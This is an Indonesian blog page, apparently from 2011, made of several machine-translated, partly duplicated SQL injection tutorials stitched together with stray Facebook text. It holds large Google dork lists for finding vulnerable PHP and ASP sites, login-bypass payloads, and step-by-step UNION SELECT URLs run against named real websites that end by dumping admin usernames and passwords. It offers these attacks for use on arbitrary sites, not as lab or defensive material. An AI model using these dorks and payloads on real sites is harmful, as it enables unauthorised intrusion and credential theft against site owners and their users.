Sqli (alias Sql Injection Injection atau Structured Query Language) adalah langkah pertama dalam entri untuk mengeksploitasi atau hacking website. Hal ini mudah dilakukan dan merupakan titik awal dari yang besar. Sayangnya kebanyakan menghisap sqli tutorial, sehingga itulah sebabnya saya menulis yang satu ini. Sqli pada dasarnya hanya menyuntikkan query ke dalam database atau menggunakan query untuk mendapatkan otorisasi memotong sebagai seorang admin.
Mencari Situs untuk Inject:
Mencari SQLI Rentan duduk sangat mudah semua yang perlu Anda lakukan adalah beberapa Googling. Hal pertama yang perlu Anda lakukan adalah menemukan beberapa Dorks.
SQLI Dorks:Kode:inurl: trainers.php id =?inurl: buy.php kategori =?inurl: article.php ID =?inurl: play_old.php id =?inurl: declaration_more.php decl_id =?inurl: pageid =inurl: games.php id =?inurl: page.php file =?inurl: newsDetail.php id =?inurl: gallery.php id =?inurl: article.php id =?inurl: show.php id =?inurl: staff_id =inurl: newsitem.php num =?inurl: readnews.php id =?inurl: top10.php kucing =?inurl: historialeer.php num =?inurl: reagir.php num =?inurl:? Stray-Pertanyaan-view.php num =inurl:? forum_bds.php num =inurl: game.php id =?inurl: view_product.php id =?inurl: newsone.php id =?inurl: sw_comment.php id =?inurl: news.php id =?inurl:? avd_start.php AVD =inurl: event.php id =?inurl: Produk-item.php id =?inurl: sql.php id =?inurl: news_view.php id =?inurl: select_biblio.php id =?inurl: humor.php id =?inurl: aboutbook.php id =?inurl:? ogl_inet.php ogl_id =inurl: fiche_spectacle.php id =?inurl: communique_detail.php id =?inurl: sem.php3 id =?inurl:? kategorie.php4 id =inurl: news.php id =?inurl: index.php id =?inurl: faq2.php id =?inurl:? show_an.php id =inurl: preview.php id =?inurl: loadpsb.php id =?inurl: opinions.php id =?inurl: spr.php id =?inurl: pages.php id =?inurl: announce.php id =?inurl:? clanek.php4 id =inurl: participant.php id =?inurl: download.php id =?inurl:? main.php id =inurl: review.php id =?inurl: chappies.php id =?inurl: read.php id =?inurl: prod_detail.php id =?inurl: viewphoto.php id =?inurl: article.php id =?inurl:? person.php id =inurl: productinfo.php id =?inurl:? showimg.php id =inurl: view.php id =?inurl: website.php id =?inurl: hosting_info.php id =?inurl: gallery.php id =?inurl:? rub.php idr =inurl: view_faq.php id =?inurl: artikelinfo.php id =?inurl: ID = detail.php?inurl:? index.php =inurl: profile_view.php id =?inurl: category.php id =?inurl: publications.php id =?inurl: fellows.php id =?inurl: downloads_info.php id =?inurl: prod_info.php id =?inurl: shop.php lakukan = bagian & id =?inurl: productinfo.php id =?inurl: collectionitem.php id =?inurl: band_info.php id =?inurl: product.php id =?inurl: releases.php id =?inurl: ray.php id =?inurl: produit.php id =?inurl: pop.php id =?inurl:? shopping.php id =inurl: productdetail.php id =?inurl: post.php id =?inurl: viewshowdetail.php id =?inurl: clubpage.php id =?inurl: memberInfo.php id =?inurl:? section.php id =inurl: theme.php id =?inurl: page.php id =?inurl: shredder-categories.php id =?inurl: tradeCategory.php id =?inurl: product_ranges_view.php ID =?inurl: shop_category.php id =?inurl: transcript.php id =?inurl: channel_id =inurl: item_id =inurl: NewSID =inurl: trainers.php id =?inurl:? berita-full.php id =inurl:? news_display.php getId =inurl: option = index2.php?inurl: readnews.php id =?inurl: top10.php kucing =?inurl: newsone.php id =?inurl: event.php id =?inurl: Produk-item.php id =?inurl: sql.php id =?inurl: aboutbook.php id =?inurl: preview.php id =?inurl: loadpsb.php id =?inurl: pages.php id =?inurl: material.php id =?inurl:? clanek.php4 id =inurl: announce.php id =?inurl: chappies.php id =?inurl: read.php id =?inurl: viewapp.php id =?inurl: viewphoto.php id =?inurl:? rub.php idr =inurl:? galeri_info.php l =inurl: review.php id =?inurl: iniziativa.php di =?inurl: curriculum.php id =?inurl: labels.php id =?inurl: story.php id =?inurl: look.php ID =?inurl: newsone.php id =?inurl: aboutbook.php id =?inurl: material.php id =?inurl: opinions.php id =?inurl: announce.php id =?inurl:? rub.php idr =inurl:? galeri_info.php l =inurl:? tekst.php idt =inurl: newscat.php id =?inurl:? newsticker_info.php idn =inurl:? rubrika.php idr =inurl:? rubp.php idr =inurl: offer.php IDF =?inurl:? art.php idm =inurl: title.php id =?buy.php kategori =?article.php? ID =play_old.php id =?declaration_more.php? decl_id =Pageid =games.php? id =page.php file =?newsDetail.php id =?gallery.php? id =article.php? id =play_old.php id =?show.php? id =staff_id =newsitem.php num =?readnews.php? id =top10.php kucing =?historialeer.php? num =reagir.php? num =forum_bds.php num =?game.php? id =view_product.php? id =newsone.php? id =sw_comment.php? id =news.php? id =avd_start.php AVD =?event.php? id =produk-item.php? id =sql.php id =?news_view.php? id =select_biblio.php? id =humor.php? id =aboutbook.php? id =fiche_spectacle.php? id =communique_detail.php id =?sem.php3 id =?kategorie.php4? id =faq2.php? id =show_an.php id =?preview.php? id =loadpsb.php? id =opinions.php? id =spr.php? id =pages.php? id =announce.php? id =clanek.php4? id =participant.php? id =download.php id =?main.php? id =review.php? id =chappies.php? id =read.php id =?prod_detail.php id =?viewphoto.php? id =article.php? id =play_old.php id =?declaration_more.php? decl_id =category.php? id =publications.php? id =fellows.php? id =downloads_info.php? id =prod_info.php? id =shop.php lakukan = bagian? & id =Productinfo.php? Id =website.php? id =Productinfo.php? Id =showimg.php? id =view.php? id =rub.php idr =?view_faq.php? id =artikelinfo.php? id =ID = detail.php?collectionitem.php? id =band_info.php? id =product.php? id =releases.php? id =ray.php? id =produit.php? id =pop.php? id =shopping.php? id =productdetail.php id =?post.php? id =viewshowdetail.php id =?clubpage.php? id =memberInfo.php? id =section.php id =?theme.php? id =page.php? id =shredder-categories.php? id =tradeCategory.php? id =shop_category.php? id =transcript.php? id =channel_id =item_id =NewSID =trainers.php? id =buy.php kategori =?article.php? ID =play_old.php id =?iniziativa.php? di =detail_new.php? id =tekst.php IDT =?newscat.php? id =newsticker_info.php idn =?rubrika.php idr =?rubp.php idr =?offer.php? IDF =hotel.php id =?art.php idm =?title.php? id =look.php? ID =story.php? id =labels.php? id =review.php? id =chappies.php? id =berita-full.php? id =news_display.php getId =?option = index2.php?ages.php? id ="Id =" & intext: "Peringatan: mysql_fetch_assoc ()"Id =" & intext: "Peringatan: mysql_fetch_array ()"Id =" & intext: "Peringatan: mysql_num_rows ()"Id =" & intext: "Peringatan: session_start ()"Id =" & intext: "Peringatan: getimagesize ()"Id =" & intext: "Peringatan: Unknown ()"Id =" & intext: "Peringatan: pg_exec ()"Id =" & intext: "Peringatan: array_merge ()"Id =" & intext: "Peringatan: mysql_result ()"Id =" & intext: "Peringatan: mysql_num_rows ()"Id =" & intext: "Peringatan: mysql_query ()"Id =" & intext: "Peringatan: filesize ()"Id =" & intext: "Peringatan: require ()
Pilih salah satu dari mereka Dorks dan menambahkan inurl: sebelum(Jika mereka tidak memilikinya) dan kemudian copy dan pasteke google. Pilih salah satu situs dari google dan pergi ke sana.Misalnya url dari halaman Anda berada di mungkin terlihat seperti ini
Kode:http://www.example.com/index.php?id=3
Untuk memeriksa bahwa itu adalah rentan yang harus Anda lakukan adalahmenempatkan 'pada akhir url. Jadi sekarang url Anda harusTerlihat seperti iniKode:http://www.example.com/index.php?id=3 '
Tekan enter dan Anda mendapatkan beberapa jenis kesalahan. Kesalahan akan bervariasitetapi harus terlihat seperti ini
http://i982.photobucket.com/albums/ae308/blink1337/1.pngGambar melebihi batas yang ditetapkan. Klik untuk melihat image ukuran penuh
Jika happends kesalahan situs yang vulerable!
Juga Jika Anda malas Anda dapat memeriksasaya daftar situs rentan sini
http://allianceforums.co.cc/forums/thread-1249.html
Mendapatkan Jumlah Kolom
Setelah Anda menemukan situs Anda rentan langkah pertama yang perlu Anda ambil adalahuntuk menemukan jumlah kolom. Cara termudah untuk melakukan ini adalahmenggunakan pernyataan "order by". Yang harus Anda lakukan adalah meletakkan ORDER BY (jumlah) -pada akhir url Anda. Jadi seharusnya terlihat seperti ini.
Kode:http://www.example.com/index.php?id=3 ORDER BY (jumlah) -
Anda ingin memulai dengan ORDER BY 1 - dan terus meningkat nomor dengan 1 sampai Anda mendapatkan pesan kesalahan.
Sebagai contoh
Kode:http://www.example.com/index.php?id=3 order by 1 -http://www.example.com/index.php?id=3 order by 2 -http://www.example.com/index.php?id=3 order by 3 -http://www.example.com/index.php?id=3 order by 4 -http://www.example.com/index.php?id=3 order by 5 -http://www.example.com/index.php?id=3 order by 6 -http://www.example.com/index.php?id=3 order by 7 -http://www.example.com/index.php?id=3 order by 8 -
Katakanlah pada order by 8 - Anda mendapatkan halaman kesalahan. Ini berarti bahwa website memiliki 7 kolom karenaitu akan memberikan kesalahan pada sesuatu yang lebih dari 7. Jika Anda memiliki memori buruk Anda harus membuka notepad dan# menulis kolom yang Anda temukan.
[Gambar: 2-1.png]
Menemukan Kolom Acsessable
Sekarang bahwa kita memiliki jumlah kolom yang kita butuhkan untuk mendapatkan nomor kolom yang kita bisa ambil informasi dari.Kami melakukan ini dengan dengan menggunakan "Uni" "pilih" dan Jumlah kolom. Anda menempatkan mereka bersama-sama dalam Andaurl seperti iniKode:http://www.example.com/index.php?id=-3+UNION+SELECT+1 ,2,3,4,5,6,7 -
Untuk bagian akhir url, (1,2,3,4,5,6,7) Anda menempatkan jumlah kolomAnda ditemukan di langkah pertama. Sejak saya menemukan bahwa situs saya sedang menguji telah 7kolom Aku meletakkan 1,2,3,4,5,6,7. Juga ingat untuk menempatkan - Infront dari nomor id.Setelah Anda melakukan itu Anda harus mendapatkan sesuatu seperti ini ...
[Gambar: 3.png]
Halaman harus terlihat sedikit kacau dan harus ada 2 angka pada halaman.Ini dua nomor adalah nomor Colum kita bisa mendapatkan informasi dari. Kami akan menggantikan mereka dengan pernyataan-pernyataan di kemudian hari sehinggamenulis mereka bawah atau mengingatnya.
Mencari Versi MySQL DatabaseAlasan Anda membutuhkan nama database adalah untuk melihat cuaca atau tidak website ini bernilai waktu Andakarena database mSQL bawah 5 Anda harus membabi buta menebak nama tabel dan kolom.Jika Anda seorang pemula dan Anda menemukan bahwa database berada di bawah 5 saya mendorong Anda untuk menemukansitus yang berbeda.
Sekarang kita mengambil salah satu nomor yang kami temukan dari langkah di atas dan ganti dengan @ @ versionSebagai contoh, sebelum url kita tampak seperti iniKode:http://www.example.com/index.php?id=-3+UNION+SELECT+1 ,2,3,4,5,6,7 -
Sekarang karena kami akan mengganti 1 dengan @ @ version
Kode:http://www.example.com/index.php?id=-3+UNION+SELECT+ @ @ versi ,2,3,4,5,6,7 -Tekan enter dan sekarang halaman harus menampilkan nomor database.
[Gambar: 4.png]
Sekarang nomor yang kita miliki di langkah pertama akan diganti dengan nomor database. Seperti itu menunjukkan atasSitus yang saya pengujian memiliki nomor versi 5.0.45. Karena nomor ini adalah 5 atau di atas, kami akan terus bekerja padasitus ini.
Mencari Nama Basis Data
Selanjutnya kita akan menyuntikkan website untuk mencari nama database. Kami melakukan ini dengan mengganti @ @ versiondengan GROUP_CONCAT (schema_name) dan juga menambahkan + dari + information_schema.schemata-- setelah nomor terakhir di url kamiJadi sekarang url kita harus terlihat seperti ini
Kode:http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat (schema_name), 2,3,4,5,6,7 + dari + information_schema.schemata--
Anda harus mendapatkan sesuatu seperti ini ketika Anda pergi ke url itu.
[Gambar: 5.png]
Ini akan daftar nama database. Sekarang untuk menemukan mana yang digunakan saat ini menggantikan GROUP_CONCAT (schema_name) denganconcat (database ()) dan menghapus + dari + information_schema.schemata Jadi url sekarang harus terlihat seperti ini
Kode:http://www.example.com/index.php?id=-3+UNION+SELECT+concat (database ()) ,2,3,4,5,6,7 -Ini akan menampilkan database yang digunakan yang. Anda mungkin ingin menuliskannya.
[Gambar: 6.png]
Mencari Nama Tabel
Untuk mendapatkan nama tabel dari database saat ini Anda perlu mengganti concat (database ()) dengan GROUP_CONCAT (nama_tabel)dan menambahkan dari information_schema.tables mana table_schema = database () antara nomor terakhir dan - juga menghapus+ Tanda-tanda dari serikat pilih. Sekarang url Anda akan terlihat seperti ini
Kode:http://www.example.com/index.php?id=-3 serikat pilih GROUP_CONCAT (nama_tabel), 2,3,4,5,6,7 dari information_schema.tables mana table_schema = database () -
Halaman sekarang harus menunjukkan nama Tabel. Anda mungkin ingin menuliskannya.
http://i982.photobucket.com/albums/ae308/blink1337/untitled-1.pngGambar melebihi batas yang ditetapkan. Klik untuk melihat image ukuran penuh
Mencari Nama Kolom
Ini adalah persis seperti mendapatkan nama tabel Anda hanya mengubah nama_tabel untuk nama_kolom dan information_schema.tables untuk information_schema.columns.Jadi url Anda akan terlihat seperti.
Kode:http://www.example.com/index.php?id=-3 serikat pilih GROUP_CONCAT (nama_kolom), 2,3,4,5,6,7 dari information_schema.columns mana table_schema = database () -
Ini harus memberikan nama kolom. Anda mungkin ingin menuliskannya.
Katakanlah mereka memberi kami kembali nama cloumn
admin_usernameadmin_password
Mendapatkan Informasi
Sekarang kita dapat memiliki nama database, nama tabel, dan nama colomn kita bisa menempatkan mereka bersama-sama danmenarik informasi dari mereka. Lakukan untuk ini kita perlu menempatkan berikut di url kami.Kode:http://www.example.com/index.php?id=-3 serikat pilih 1, GROUP_CONCAT (ColumnName, 0x3a, columnname, 0x3a), 2,3,4,5,6,7 dari databasename.tablename--
Sekarang ganti columnname dengan nama kolom Anda ingin informasi dari. Para 0x3a akan membuat: untuk memisahkan informasiuntuk Anda. Masukan sebagai nama kolom yang Anda ingin ingat untuk tetap format. Juga mengganti databasename.tablenameDengan nama database dan nama tabel nama-nama kolom di mana masuk Setelah semua ini url Anda harus terlihatseperti ini.
Kode:http://www.example.com/index.php?id=-3 serikat pilih 1, G
fb
Selamat Datang di Facebook - Masuk, Daftar atau Pelajari Selengkapnya!doctype>
Kamis, 15 Desember 2011
toturial 2
Untuk pertama kalinya gw mau memberanikan diri untuk posting tentang SQL Injection, soal nya gw juga masih belajar dalam hal ini kalo kiranya gw salah tolong di koreksi dan yang udah master jangan baca postingan ini ini cuma buat newbie kaya gw
DORK
Code: Select all
inurl:news_detail.php?id=
Contoh target
Code: Select all
http://www.lbpl.in/news_detail.php?id=14
masukian tanda petik (')
kurang lebih seperti di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=14'
lalu muncul error seperti
Code: Select all
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
berarti site ini Vuln, setelah terdapat error seperti di atas gunakan perintah ORDER BY untuk mencari panjang column, dan jangan lupa gunakan -- di belakang angka yang di masukan
contoh nya seperti di bawah ini
http://www.lbpl.in/news_detail.php?id=1 ... 20by%201--
tidak menampilkan eror coba gunakan order by 10 atau 100
kurang lebih nya seperti contoh
Code: Select all
http://www.lbpl.in/news_detail.php?id=14%20order%20by%2010--
order by 10 site mengeluarkan error seperti Unknown column '10' in 'order clause' berarti panjang column tidak sampai 10 coba gunakan order by 5 untuk mengecek nya.. ternyata site masih mengeluarkan error seperti di atas gunakan lagi order by 4 untuk mengecek yang ke 3 kali nya.......... sssttttt site tidak menampilkan error setelah itu gunakan perintah UNION+ALL+SELECT+1,2,3,4-- loh kok cuma sampai 4 karena batas eror nya ada di column 4, jangan lupa gunakan gunakan (-) kurang lebih contoh nya seperti di bawah
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14 union all select 1,2,3,4--
setelah menggunakan perintah UNION+ALL+SELECT+1,2,3,4-- site tidak mengeluarkan error melainkan mengeluarkan angka angka ajaib kenapa di sebut ajaib karena dengan angka itu kita bisa melanjutkan SQLInjection he2
setelah angka muncul gunakan perintah VERSION() column angka, contoh nya di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,version(),3,4--
setelah menggunakan perintah VERSION() muncul seperti 5.0.77MM0.1-LOG
ternyata versi 5 beruntung lah gw malam ini ck ck soal nya kalo Versi 4 musti tebak tebak table nya ok masalah versi 4 ntr nyusul lagi
setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- di belakang column, perintah tersebut untuk mengetahi nama nama table pada database;) kurang lebih contohnya di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(TABLE_NAME),3,4%20FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
Setelah menggunakan perintah di atas muncul ADMIN,BANNER,CATALOGUE,NEWS,USERS,VIDEO Gunakan table admin, sebelum nya kita meng-konversi dolo table admin menjadi bentuk hexadecimal_sql seperti 0x41444d494e kurang lebih contoh nya seperti
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(column_NAME),3,4%20FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x41444d494e--
setelah itu muncul ID,USERNAME,PASS inilah detik detik menuju ahir ganti Column_name dengan 0x2b,USERNAME,PASS kurang lebih nya lihat contoh yang terahir kali nya....
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(0x2b,USERNAME,PASS),3,4%20FROM+admin--
nah ahir dari perjalanan ini adalah ADMINADMIN Username = admin Pass = admin
Cukup sampai di sini Tutorial CUPU dari gw kalo ada salah kata atau penempatan tulisan tolong di koreksi, sekian dan Terima kasih.....
DORK
Code: Select all
inurl:news_detail.php?id=
Contoh target
Code: Select all
http://www.lbpl.in/news_detail.php?id=14
masukian tanda petik (')
kurang lebih seperti di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=14'
lalu muncul error seperti
Code: Select all
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
berarti site ini Vuln, setelah terdapat error seperti di atas gunakan perintah ORDER BY untuk mencari panjang column, dan jangan lupa gunakan -- di belakang angka yang di masukan
contoh nya seperti di bawah ini
http://www.lbpl.in/news_detail.php?id=1 ... 20by%201--
tidak menampilkan eror coba gunakan order by 10 atau 100
kurang lebih nya seperti contoh
Code: Select all
http://www.lbpl.in/news_detail.php?id=14%20order%20by%2010--
order by 10 site mengeluarkan error seperti Unknown column '10' in 'order clause' berarti panjang column tidak sampai 10 coba gunakan order by 5 untuk mengecek nya.. ternyata site masih mengeluarkan error seperti di atas gunakan lagi order by 4 untuk mengecek yang ke 3 kali nya.......... sssttttt site tidak menampilkan error setelah itu gunakan perintah UNION+ALL+SELECT+1,2,3,4-- loh kok cuma sampai 4 karena batas eror nya ada di column 4, jangan lupa gunakan gunakan (-) kurang lebih contoh nya seperti di bawah
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14 union all select 1,2,3,4--
setelah menggunakan perintah UNION+ALL+SELECT+1,2,3,4-- site tidak mengeluarkan error melainkan mengeluarkan angka angka ajaib kenapa di sebut ajaib karena dengan angka itu kita bisa melanjutkan SQLInjection he2
setelah angka muncul gunakan perintah VERSION() column angka, contoh nya di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,version(),3,4--
setelah menggunakan perintah VERSION() muncul seperti 5.0.77MM0.1-LOG
ternyata versi 5 beruntung lah gw malam ini ck ck soal nya kalo Versi 4 musti tebak tebak table nya ok masalah versi 4 ntr nyusul lagi
setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- di belakang column, perintah tersebut untuk mengetahi nama nama table pada database;) kurang lebih contohnya di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(TABLE_NAME),3,4%20FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
Setelah menggunakan perintah di atas muncul ADMIN,BANNER,CATALOGUE,NEWS,USERS,VIDEO Gunakan table admin, sebelum nya kita meng-konversi dolo table admin menjadi bentuk hexadecimal_sql seperti 0x41444d494e kurang lebih contoh nya seperti
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(column_NAME),3,4%20FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x41444d494e--
setelah itu muncul ID,USERNAME,PASS inilah detik detik menuju ahir ganti Column_name dengan 0x2b,USERNAME,PASS kurang lebih nya lihat contoh yang terahir kali nya....
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(0x2b,USERNAME,PASS),3,4%20FROM+admin--
nah ahir dari perjalanan ini adalah ADMINADMIN Username = admin Pass = admin
Cukup sampai di sini Tutorial CUPU dari gw kalo ada salah kata atau penempatan tulisan tolong di koreksi, sekian dan Terima kasih.....
toturial 1
Hello setiap orang.Saya akan berbagi dengan salah satu yang terbaik tutorial saya di sini.
Sekarang Mari kita mulai!
Sql injeksi (alias Sql Injection atau Injection Structured Query Language) adalah langkah pertama dalam entri untuk mengeksploitasi atau hacking website. Hal ini mudah dilakukan dan merupakan titik awal dari yang besar. Sayangnya kebanyakan menghisap sqli tutorial, sehingga itulah sebabnya saya menulis yang satu ini. Sqli pada dasarnya hanya menyuntikkan query ke dalam database atau menggunakan query untuk mendapatkan otorisasi memotong sebagai seorang admin.
Hal yang harus Anda ketahui:Data dalam kolom dan kolom dalam tabel dan tabel dalam database.Hanya ingat bahwa begitu Anda memahami sisanya.
BAGIAN 1Melewati login admin diMendapatkan melewati auth di account admin.
Kebanyakan situs rentan terhadap ini. AspPertama kita perlu 2 menemukan sebuah situs, mulai dengan membuka google.Sekarang kita ketik dork kami: "defenition of dork" 'entri pencarian untuk jenis tertentu dari situs / mengeksploitasi dll ".Ada sejumlah besar google dork untuk injeksi sql dasar.di sini adalah yang terbaik:
Kode:"Inurl: admin.asp""Inurl: login / admin.asp""Inurl: admin / login.asp""Inurl: adminlogin.asp""Inurl: adminhome.asp""Inurl: admin_login.asp""Inurl: administratorlogin.asp""Inurl: login / administrator.asp""Inurl: administrator_login.asp"Sekarang apa yang harus dilakukan setelah kita mendapatkan ke situs kami.situs harus terlihat seperti ini:ADMIN USERNAME:PASSWORD:
jadi apa yang kita lakukan di sini adalah username kita selalu ketik "Admin"dan untuk password kita kita ketik kita injeksi sql
di sini adalah daftar dari sql injeksiKode:'Atau '1' = '1'Atau' x '=' x'Atau 0 = 0 -
"Atau 0 = 0 -
atau 0 = 0 -
'Atau 0 = 0 #
"Atau 0 = 0 #
atau 0 = 0 #
'Atau' x '=' x
"Atau" x "=" x
') Atau (' x '=' x
'Atau 1 = 1 -
"Atau 1 = 1 -
atau 1 = 1 -
'Atau a = -
"Atau" "=" a
') Atau (' a '=' a
") Atau (" a "=" a
hi "atau" "=" a
hi "atau 1 = 1 -
hi 'atau 1 = 1 -'Or'1 = 1'Jadi masukan Anda akan terlihat seperti ini
username: Adminsandi: 'or'1' = '1yang akan membingungkan situs dan memberikan otorisasi untuk masuk sebagai admin
Jika situs rentan daripada Anda berada di: D
BAGIAN 2Mencari Situs untuk Suntikkan
Mencari SQLI Rentan duduk sangat mudah semua yang perlu Anda lakukan adalah beberapa Googling. Hal pertama yang perlu Anda lakukan adalah menemukan beberapa Dorks.Ambil SQLI Dorks daftar dari sini: http://www.mediafire.com/?y7v30lcj0kn8836http://adf.ly/cjpJ <sandi --- adalah suatu tempat di dalamnyaPS: Saya tidak menempatkan mereka di thread karena saya melewati batas hitungan ...Pilih salah satu dari mereka Dorks dan menambahkan inurl: sebelum (Jika mereka tidak memilikinya) dan kemudian copy dan paste ke google. Pilih salah satu situs dari google dan pergi ke sana.Misalnya url dari halaman Anda berada di mungkin terlihat seperti ini:
Quote: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10
Untuk memeriksa bahwa itu adalah rentan yang harus Anda lakukan adalah menambahkan 'a
Jadi link kami akan terlihat seperti itu:
Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=10 '
Tekan enter dan Anda mendapatkan beberapa jenis kesalahan. Kesalahan akan bervariasi ...
Halaman kami harus seperti itu: (Klik untuk Lihat)Setelah Anda menemukan situs Anda rentan langkah pertama yang perlu Anda ambil adalah untuk menemukan jumlah kolom. Cara termudah untuk melakukan ini adalah tulisan "order by" jumlah kolom dan kita menambahkan "-" setelah nomor.Link kami akan terlihat seperti itu:
Quote: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15 -
Jika Anda mendapatkan error yang berarti Anda harus menurunkan jumlah kolom.Mari kita coba 10.
Quote: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10 -
Halaman dibuka secara normal itu berarti jumlah kolom adalah antara 10 dan 14.Kami mencoba sekarang 11.
Quote: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11 -
Halaman dibuka biasanya terlalu ...Mari kita coba 12.
Quote: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12 -
Kami punya kesalahan. Itu berarti jumlah kolom adalah 11 karena kita punya kesalahan pada 12 dan 11 dibuka secara normal.
Menemukan Kolom diaksesSekarang bahwa kita memiliki jumlah kolom yang kita butuhkan untuk mendapatkan nomor kolom yang kita bisa ambil informasi dari.Kita dapat melakukannya dengan menambahkan sebuah "-" sebelum "10" menggantikan "order by #" dengan "serikat semua pilih" dan kolom nomorLink kami akan terlihat seperti itu:
Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=-10 serikat semua pilih 1,2,3,4,5,6,7,8,9,10,11 -
Kita harus mendapatkan nomor.
Halaman kami harus seperti itu: (Klik untuk Lihat)
Untuk bagian akhir url, (1,2,3,4,5,6,7,8,9,10,11) Anda menempatkan jumlah kolom yang Anda temukan pada langkah pertama. Sejak saya menemukan bahwa situs saya sedang menguji memiliki 11 kolom, saya meletakkan 1,2,3,4,5,6,7,8,9,10,11 -Jumlah ini nomor Colum kita bisa mendapatkan informasi dari. Kami akan menggantinya dengan sesuatu yang lain nanti jadi menulis mereka bawah jika Anda inginkan.
Mendapatkan Versi Basis DataKami menemukan bahwa kolom 8, 3, 4 dan 5 yang rentan jadi kita akan menggunakannya untuk mendapatkan versi database.Mengapa kita melakukannya?Jika database berada di bawah 5 yang berarti kita harus menebak nama tabelUntuk melakukan itu kita perlu mengganti salah satu dari kolom rentan dengan "verion @ @"Mari kita kolom 8.Link kami akan terlihat seperti itu:
Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=-10 serikat semua pilih 1,2,3,4,5,6,7, @ @ versi ,9,10,11 -
Halaman harus terlihat seperti itu: (Klik untuk Lihat)
Dalam kasus kami, kami mendapat "5.0.77"> nya 5 sehingga kami dapat terus.
Sekarang kita perlu untuk mendapatkan nama tabel kita ingin mengakses:Untuk melakukannya kita perlu mengganti "@ @ version" dengan "table_name" dan menambahkan setelah nomor kolom terakhir "dari information_schema.tables" dan menambahkan "-" pada akhirnya.Link harus seperti itu:
Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=-10 serikat semua pilih 1,2,3,4,5,6,7, table_name, 9,10,11 dari information_schema.tables -
Halaman harus terlihat seperti itu: (Klik untuk Lihat)
Sekarang kita akan mencari tabel yang ingin kita akses.Kita harus sesuatu yang baik dengan admin di atasnya dan dalam kasus kami itu tbladmin
Spoiler (Klik untuk Lihat)
Sekarang kita perlu untuk mendapatkan nilai ASCII dari "tbladmin".Apa itu ASCII?http://en.wikipedia.org/wiki/ASCII_valueSekarang untuk mendapatkan nilai ASCII dari "tbladmin" pergi ke situs: http://getyourwebsitehere.com/jswb/text_to_ascii.html
Spoiler (Klik untuk Lihat)
Sekarang masukkan dalam kotak pertama nama tabel yang "tbladmin" dalam kasus kami dan klik dikonversi ke ASCII.Anda akan mendapatkan sebagai nilai yang:Kode:tbladminSekarang menghapus karakter sebagai & #; dan kami menambahkan koma "," antara setiap nomor.Ini harus seperti itu:Kode:116,98,108,97,100,109,105,110
Spoiler (Klik untuk Lihat)
Sekarang kita ganti dalam URL yang "table_name" untuk "nama_kolom" dan mengubah "information_schema.tables" untuk "information_schema.columns dan menambahkan" mana nama_tabel = char (nilai ASCII) -dalam kasus kami di tempat (nilai ASCII) kami menempatkan (116,98,108,97,100,109,105,110) -URL kita akan terlihat seperti itu:
Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=-10 serikat semua pilih 1,2,3,4,5,6,7, nama_kolom, 9,10,11 dari information_schema.columns mana nama_tabel = char (116,98,108,97,100,109,105,110) -
Halaman kami harus seperti itu:
Spoiler (Klik untuk Lihat)
Sekarang kita mencari kolom bernama "username" dan "password" atau sesuatu seperti itu.Dalam kasus kami itu adalah "username" dan "password".Sekarang kita dapat menghapus sebagian besar URL.Menghapus semuanya setelah 11 dan menambahkan: "dari tbladmin" Dan ganti "nama_kolom" dengan "concat (username, 0x3a, password)0x3a adalah nilai ASCII dari: sehingga kita dapat memisahkan nama pengguna dari password.URL kita akan terlihat seperti itu:
Quote: http://www.leadacidbatteryinfo.org/newsd...php?id=-10 serikat semua pilih 1,2,3,4,5,6,7, concat (username, 0x3a, sandi), 9, 10,11 dari tbladmin
Halaman kami harus seperti itu:
Spoiler (Klik untuk Lihat)
Dan Anda sudah selesai username dan password ishir ishir123Beberapa kali sandi dienkripsi dengan kilatan.Menggunakan detektor Hash saya untuk tahu apa itu dan mendekripsi online.http://www.mediafire.com/?7qd7t6r3b13ccq4<---- http://adf.ly/cjpJ password di suatu tempat:)Dan Kami Selesai!
Saya harap Anda menyukai tutorial saya.SEMUA kredit pergi ke saya!Terima kasih untuk membaca thread tersebut.
Posted in: injeksi SQL
http
http://www.w3schools.com/sql/default.asp
http://www.sql.org/sql-database/sql-tutorial/
http://www.sql.org/sql-database/sql-tutorial/
Jumat, 02 Desember 2011
toturial 4
